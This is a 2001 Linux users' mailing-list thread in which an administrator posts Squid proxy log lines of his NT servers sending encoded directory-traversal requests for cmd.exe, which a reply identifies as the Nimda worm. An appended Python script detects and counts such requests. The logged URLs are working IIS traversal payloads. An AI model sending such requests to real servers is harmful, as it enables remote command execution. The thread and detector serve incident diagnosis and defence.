Looks like the new NIMDA worm. Please go to this site.
http://www.cert.org/advisories/CA-2001-26.html
----- Original Message -----
From: Arvin V. Carlos <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: Plug Mailing List <[EMAIL PROTECTED]>
Sent: Wednesday, September 19, 2001 10:35 AM
Subject: [plug] WinNT Server Access Problem
>
> We have two NT 4.0 running IIS, suddenly our squid went down because of
> disk space problem, we check our log files and it eats our disk space
> because of our NT Machines try to resolve this all the time:
>
> 255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.455 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.487 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.496 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/d/winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.505 2 208.142.136.115 TCP_MISS/503 1200 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.514 2 208.142.136.115 TCP_MISS/503 1242 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.530 1 208.142.136.115 TCP_MISS/503 1242 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.539 2 208.142.136.115 TCP_MISS/503 1299 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.548 2 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.557 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
>
> Can anyone explain this? Is this a virus? Pls HELP!!!
>
> --
> ===============================================================================
> Arvin V. Carlos                  Office Phone:
> Linux System Administrator       (047)237-6001/237-6002
> Pccomshop Inc.                   http://www.pccomshop.com
>
> -- Some people are afraid of nothing! --
> ===============================================================================
>
> Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
>
> To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
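
One way to find which clients are sending the requests quoted in the message above, as an added example that is not part of the original thread: it scans Squid native-format access.log lines for the encoded-traversal `cmd.exe` requests and counts them per client IP. The sample log is constructed from the lines in the post, and all function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in Squid native access.log format, modelled on the post's lines.
SAMPLE_LOG = """\
1000866350.455 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.487 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -
1000866350.514 2 208.142.136.115 TCP_MISS/503 1242 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.557 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
1000866351.100 35 192.0.2.10 TCP_MISS/200 5120 GET http://example.org/index.html - DIRECT/example.org text/html
"""
# Fields: timestamp, elapsed ms, client, action/status, bytes, method, URL.
LINE_RE = re.compile(r"^(\d+\.\d+)\s+\d+\s+(\S+)\s+\S+/\d{3}\s+\d+\s+(\S+)\s+(\S+)")
# Encoded path separators that appear in the post's log lines.
TRAVERSAL_TOKENS = ("%255c", "%c1%1c", "%c0%2f")

def fully_unquote(s, rounds=3):
    """Percent-decode repeatedly so that %255c -> %5c -> backslash."""
    for _ in range(rounds):
        decoded = unquote(s, errors="replace")
        if decoded == s:
            break
        s = decoded
    return s

def classify(url):
    """Return a reason string if the URL matches the probes in the post, else None."""
    lowered = url.lower()
    tokens = [t for t in TRAVERSAL_TOKENS if t in lowered]
    targets_cmd = "/winnt/system32/cmd.exe" in fully_unquote(lowered).replace("\\", "/")
    if tokens and targets_cmd:
        return "encoded traversal to cmd.exe (" + ",".join(tokens) + ")"
    if targets_cmd:
        return "direct request for cmd.exe"
    return None

def suspicious_clients(log_text):
    """Map each client IP to a Counter of the reasons its requests were flagged."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in native access.log format
        _, client, _method, url = m.groups()
        reason = classify(url)
        if reason:
            hits.setdefault(client, Counter())[reason] += 1
    return hits
```

Calling `suspicious_clients()` on the contents of the proxy's access.log gives the per-client counts; a client that appears there is a host to take off the network and check against the CERT advisory.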